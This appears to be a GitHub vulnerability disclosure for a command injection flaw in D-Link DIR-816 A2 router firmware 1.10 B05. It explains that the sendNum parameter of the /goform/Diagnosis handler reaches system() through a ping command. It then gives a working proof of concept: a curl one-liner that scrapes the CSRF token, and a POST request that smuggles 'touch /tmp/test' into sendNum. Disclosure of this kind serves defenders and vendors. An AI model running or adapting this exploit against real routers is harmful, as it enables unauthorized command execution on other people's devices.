Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

D-Link DIR-816 A2 Command Injection

Vender :D-Link

Firmware version:1.10 B05

Exploit Author:

Vendor Homepage:

Hardware Link:

Vul detail

In the handler of route /goform/Diagnosis, the value of parameter sendNum is used in the construction of command ping -c %s ..., which is later fed to system:

So it could lead to command injection with crafted request.


There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:

TOKENID=`curl -s | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`

Then we could send the crafted parameter along with the token to the route:

curl -i -X POST -d tokenid=$TOKENID -d 'pingAddr=' -d 'sendNum=3;touch /tmp/test;'
You can’t perform that action at this time.